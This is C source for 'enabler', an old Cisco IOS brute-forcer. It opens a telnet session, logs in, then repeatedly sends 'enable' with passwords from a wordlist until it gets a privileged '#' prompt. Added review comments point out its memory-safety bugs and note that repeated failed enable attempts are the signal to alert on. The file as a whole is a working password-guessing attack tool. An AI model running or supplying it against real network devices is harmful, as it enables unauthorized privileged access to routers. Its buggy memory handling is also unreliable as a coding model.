  1. /*
  2. enabler.
  3. Cisco IOS privileged EXEC bruteforcer
  4.  
  5. Year: 2001
  6. Included in Linux Backtrack v2
  7.  
  8. */
  9.  
  10.  
  11.  
  12. #include <stdio.h>
  13. #include <stdlib.h>
  14. #include <errno.h>
  15. #include <sys/socket.h>
  16. #include <netinet/in.h>
  17. #include <netdb.h>
  18. #include <signal.h>
  19. #include <string.h>
  20.  
/* Prefix for every status line: ANSI SGR escape sequences that draw a coloured "[`]" tag. */
#define BOX "\033[0m\033[34;1m[\033[0m\033[37;1m`\033[0m\033[34;1m]"

/* Connection state shared by resolve(), sock(), login() and brute(). */
struct sockaddr_in addr; /* destination address, filled in by sock() */
char host[100]; /* dotted-quad text of the target, written by resolve() */
struct hostent *hp; /* gethostbyname() result, set by resolve() */
int sock_stat; /* TCP socket descriptor created by sock() */

/* Wordlist state: brute() increments n for every candidate it sends,
   loadwordlist() increments x for every entry it stores. */
int n,x;
char **password; /* entries stored by loadwordlist(); a null pointer follows the last one */
  30.  
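/*
 * Store a dotted-quad IPv4 string for `inputhost` in the global `host` buffer.
 *
 * If `inputhost` already scans as four dot-separated integers it is copied
 * as-is; otherwise it is looked up with gethostbyname() and the first address
 * returned is formatted into `host`. On lookup failure the function prints an
 * error and terminates the process with exit(0).
 *
 * Returns 0 (the declared return type is char; callers in this file ignore it).
 */
char resolve(char *inputhost) {
    int a, b, c, d;

    if (sscanf(inputhost, "%d.%d.%d.%d", &a, &b, &c, &d) != 4) {
        hp = gethostbyname(inputhost);
        /* Also reject an answer with no usable 4-byte address instead of
           dereferencing a missing entry below. */
        if (hp == NULL || hp->h_addr_list[0] == NULL || hp->h_length < 4) {
            printf("%s error on host resolving\n\033[0m\n", BOX);
            exit(0);
        }
        const unsigned char *ip = (const unsigned char *)hp->h_addr_list[0];
        snprintf(host, sizeof host, "%d.%d.%d.%d", ip[0], ip[1], ip[2], ip[3]);
    } else {
        /* snprintf always NUL-terminates; the previous strncpy(host, inputhost, 100)
           left `host` unterminated when the argument was 100 bytes or longer. */
        snprintf(host, sizeof host, "%s", inputhost);
    }
    return 0;
}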
  45.  
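/*
 * Open a TCP connection to the address held in the global `host` buffer on
 * `port` and keep the descriptor in the global `sock_stat`.
 *
 * `hostoresolve` is accepted for interface compatibility but is not read; the
 * only caller in this file passes `host` itself.
 *
 * Any failure prints an error and terminates the process with exit(0).
 * Returns 0 on success.
 */
int sock(char *hostoresolve, int port) {
    int err;

    (void)hostoresolve;

    sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock_stat < 0) {
        printf("%s error opening socket\n\033[0m\n", BOX);
        exit(0);
    }

    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = inet_addr(host);
    /* inet_addr() reports an unparsable string as INADDR_NONE; fail here
       rather than handing that value to connect(). */
    if (addr.sin_addr.s_addr == INADDR_NONE) {
        printf("%s error opening connection\n\033[0m\n", BOX);
        exit(0);
    }

    err = connect(sock_stat, (struct sockaddr *)&addr, sizeof(addr));
    if (err < 0) {
        printf("%s error opening connection\n\033[0m\n", BOX);
        exit(0);
    }
    return 0;
}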
  60.  
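/* Print the three-line startup banner to stdout, each line prefixed with BOX.
   Returns 0; the original fell off the end of a non-void function. */
int banner() {
    printf("\n%s enabler.\n", BOX);
    printf("%s cisco internal bruteforcer. concept by anyone\n", BOX);
    printf("%s coded by norby\n", BOX);
    return 0;
}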
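/* Print the command-line synopsis to stdout; `argv` is the program name to show.
   Returns 0; the original fell off the end of a non-void function. */
int usage(char *argv) {
    printf("%s usage: %s <ip> [-u user] <pass> <passlist> [port]\n\n\033[0m", BOX, argv);
    return 0;
}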
  67.  
/* SIGINT handler installed by main(): report how many candidates were sent
   (only when at least one was), reset the terminal colours and exit. */
void sig() {
    if (n > 0) {
        printf("%s %i passwords tryed. no password matching. leaving\n", BOX, n);
    }
    fputs("\n\033[0m", stdout);
    exit(0);
}
  72.  
/*
 * Drive the initial login dialogue on the already-connected socket sock_stat.
 *
 * login: username to send if the peer asks for one; main() passes the sentinel
 *        "n0login" when no -u option was given.
 * pass:  login password, written to the socket followed by "\r\n".
 *
 * Both values are echoed to stdout and go out through plain write() calls on
 * the TCP socket, i.e. unencrypted on the wire.
 *
 * NOTE(review): declared int but no value is returned; the caller ignores it.
 * NOTE(review): the malloc() result is neither checked nor freed.
 * NOTE(review): read() does not NUL-terminate, and the first read lands in
 * uninitialised malloc memory, so strstr() may scan past the received data.
 */
int login(char *login, char *pass) {

char *input = malloc(4000);
/* NOTE(review): stays uninitialised if the first loop ends without matching a prompt. */
int reqlogin;

/* Wait for the first prompt: a username prompt or a bare password prompt. */
while (read (sock_stat, input, 4000) > 0) {
if(strstr(input,"ogin:")||strstr(input,"sername:")) {
/* A username is requested but none was supplied on the command line. */
if(!strcmp(login,"n0login")) {
printf("%s username needed... give me a username next time :)\n\n\033[0m", BOX);
exit(0);
}
printf("%s login requested. sending [%s] and [%s]\n", BOX, login, pass); reqlogin=1; break;
}
if(strstr(input,"assword:")) { printf("%s only password needed. sending [%s]\n", BOX, pass); reqlogin=0; break; }
bzero(input,4000);
}

if(reqlogin==1) {
write(sock_stat,login,strlen(login));
write(sock_stat,"\r\n",2);

while(read(sock_stat,input,4000)>0) {
/* NOTE(review): the ';' after the condition makes the if an empty statement,
   so the break below runs after the first successful read regardless of content. */
if(strstr(input,"assword")); { break; }
}
}

write(sock_stat,pass,strlen(pass));
write(sock_stat,"\r\n",2);

/* Fixed two-second pause before reading the reply. */
sleep(2);

bzero(input,4000);

/* Read replies: '>' is taken as a successful login, a repeated username prompt as a rejected one. */
while (read (sock_stat, input, 4000) > 0) {
if(strstr(input,">")) { printf("%s seems we are logged in :)\n", BOX); break; }
/* if(strstr(input,"assword:")) {
printf("%s sorry... [%s] is not a good password for login :�\n\033[0m\n",BOX,pass); exit(0);
}*/
if(strstr(input,"sername:")) {
printf("%s sorry... [%s] is not a good password for login :�\n\033[0m\n",BOX,pass); exit(0);
}
bzero(input,4000);
}
}
  117.  
/*
 * Read the wordlist file `list` into the global `password` array and count the
 * stored entries in the global `x`. Lines that start with '#' or are empty are
 * skipped; the first '\n' or '\r' of a line is overwritten with a terminator.
 * Exits the process (status 0) if the file cannot be opened, if the allocation
 * fails, or if fewer than four entries were stored.
 *
 * NOTE(review): declared int but no value is returned; the caller ignores it.
 * NOTE(review): `fake` and `z` are never used.
 */
int loadwordlist(char *list) {

FILE *passlist;
char buf[32], fake;
int i,z;

if ((passlist = fopen(list, "r")) == NULL) {
printf("%s sorry, unable to open the passlist [%s]\n\033[0m\n", BOX,list);
exit(0);
}

/* Original author's note (translated): a mental hack to allocate only the
   memory the passlist needs. */
/* NOTE(review): the size is the file length in bytes, but the block is used as
   an array of char * plus a terminating null pointer. Whenever the file has
   fewer bytes than (entries + 1) * sizeof(char *), the stores below write past
   the allocation. The ftell() result is also not checked for -1. */
(void)fseek(passlist, 0L, SEEK_END);
password = malloc(ftell(passlist));
if(password == NULL) {
printf("%s sorry, can't allocate memory for passlist. buy more ram or cut the passlist\n\033[0m\n",BOX);
exit(0);
}

(void)fseek(passlist, 0L, SEEK_SET);

/* NOTE(review): feof() only becomes true after a read has failed and the
   fgets() result is ignored, so the final pass runs on the buffer zeroed by the
   previous memset and stores one extra empty entry. brute() and the x<4 check
   below appear to rely on that extra entry - confirm before changing it. On an
   empty file the first pass reads an uninitialised buf. */
while (!feof(passlist)) {
/* Lines longer than 31 characters are split across several entries. */
fgets(buf, 32, passlist);
if (buf[0] == '#' || buf[0] == '\n') continue;
for (i = 0; i < strlen(buf); i++)
if (buf[i] == '\n'||buf[i] == '\r') buf[i] = '\0';
/* NOTE(review): per-entry malloc() result is not checked. */
password[x] = malloc(32);
strcpy(password[x], buf);
memset(buf, 0, 32);
x++;
}
password[x] = 0x0;
fclose(passlist);
if(x<4) { printf("%s sorry, but passlist must contain at least 3 passwords. leaving \n\033[0m\n",BOX); exit(0); }

}
  153.  
/*
 * Send "enable" on sock_stat and answer each password prompt with the next
 * entry of the global `password` array, using the global n as the index and
 * the global x as the entry count. A reply containing '#' is treated as a
 * privileged prompt and the previously sent entry is printed; a reply
 * containing '>' causes "enable" to be sent again. The function only leaves
 * through exit().
 *
 * NOTE(review): on the device side this would show up as repeated failed
 * enable attempts inside one session on the port chosen in main(); repeated
 * authentication failures of that kind are the signal to log and alert on.
 * NOTE(review): `N` is never used; the malloc() result is neither checked nor freed.
 * NOTE(review): read() may fill all 100 bytes, leaving strstr() without a terminator.
 * NOTE(review): if read() returns 0 or -1 (peer closed the connection), no
 * branch matches the zeroed buffer and the outer loop appears to spin forever.
 */
int brute() { // there is a stupid error... the last password is tried 2 times... must be fixed... ;)

char *input = malloc(100);
int N;

bzero(input,100);

write(sock_stat,"enable",6);
write(sock_stat,"\r\n",2);


while(1) {

/* Read until a recognised prompt arrives or the list bookkeeping says to stop. */
while(read(sock_stat,input,100)>0) {
if(n==x) { printf("%s %i passwords tried. no valid password found in the passlist\n\033[0m\n",BOX,n-1); exit(0); }
if(n+1==x) break;
if(strstr(input,"assword:")||strstr(input,"#")||strstr(input,">")) break;
bzero(input,100);
}

/* NOTE(review): if the first reply already contains '#', n is still 0 and
   password[n-1] reads before the start of the array. */
if(strstr(input,"#")) { printf("%s possible password found: %s\n\033[0m\n",BOX,password[n-1]); exit(0); }

if(strstr(input,"assword:")) {
write(sock_stat,password[n],strlen(password[n]));
write(sock_stat,"\r\n",2);
n++;
bzero(input,100);
/* The failure message names the entry sent before the current one; fflush()
   is a separate statement and runs whether or not the printf does. */
if(n>1) printf("%s %s... wrong password\n", BOX, password[n-2]); fflush(stdout);
continue;
}
/* Back at the unprivileged prompt: ask for another round of password prompts. */
if(strstr(input,">")) {
write(sock_stat,"enable\r\n",8); bzero(input,100);
}
}
}
  189.  
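/*
 * Entry point. Accepted argument layouts (see usage()):
 *
 *   prog <ip> <pass> <passlist> [port]
 *   prog <ip> -u <user> <pass> <passlist> [port]
 *
 * The port defaults to 23 when it is omitted. After the arguments are read the
 * helpers run in a fixed order: loadwordlist(), resolve(), sock(), login(),
 * brute(). Every helper terminates the process itself on failure.
 */
int main(int argc, char *argv[]) {
    int port;

    signal(SIGINT, sig);

    banner();
    if ((argc <= 3) || (argc >= 8)) { usage(argv[0]); exit(0); }

    if (!strcmp(argv[2], "-u")) {
        /* The -u form needs <ip> -u <user> <pass> <passlist>, i.e. argc >= 6.
           Without this check argc of 4 or 5 read argv[5] and argv[6], which
           are a null pointer or lie beyond the end of the argument vector. */
        if (argc < 6) { usage(argv[0]); exit(0); }

        port = (argc == 6) ? 23 : atoi(argv[6]);

        printf("%s\n", BOX);

        loadwordlist(argv[5]);
        resolve(argv[1]);
        sock(host, port);
        login(argv[3], argv[4]);
        brute();
    } else {
        port = (argc == 4) ? 23 : atoi(argv[4]);

        printf("%s\n", BOX);

        loadwordlist(argv[3]);
        resolve(argv[1]);
        sock(host, port);
        /* "n0login" is the sentinel login() treats as "no username supplied". */
        login("n0login", argv[2]);
        brute();
    }
    return 0;
}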